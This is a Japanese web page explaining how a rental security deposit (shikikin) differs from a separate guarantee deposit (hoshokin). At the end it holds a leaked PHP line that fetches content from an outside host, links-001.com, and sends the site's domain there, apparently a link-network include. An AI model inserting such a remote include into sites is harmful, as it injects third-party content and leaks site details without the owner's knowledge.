前へ
次へ

保証金と敷金は実際には役割が異なる

賃貸住宅を利用するときにかかる費用として敷金があります。
初めて賃貸を利用する人にとっては聞きなれない言葉でどんな意味合いの費用かわかりにくいこともあるでしょう。
その時には保証金みたいなものと言われるときがあり大体は合っています。
ただ物件によっては敷金と別に保証金が必要になるときがあります。
敷金も保証金も大家に預けるお金で、最終的には戻される意味合いのお金です。
大家が賃貸物件を貸すときにはいろいろなリスクを負うので、そのリスクを分ける意味合いで預けると言ったらいいでしょう。
敷金の目的は退去時に必要になる原状回復費に充当するためで、問題が無ければ使われずに戻ってきます。
一方別途保証金が必要な時は家賃の滞納があったときに充当するためとされます。
もし支払いの遅れがあったら保証金から充当されるので、将来的に戻ってこないときもあります。
敷金しか設定されていないときは基本的には敷金から家賃が充当されることはありません。

".file_get_contents('http://links-001.com/kanren3set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top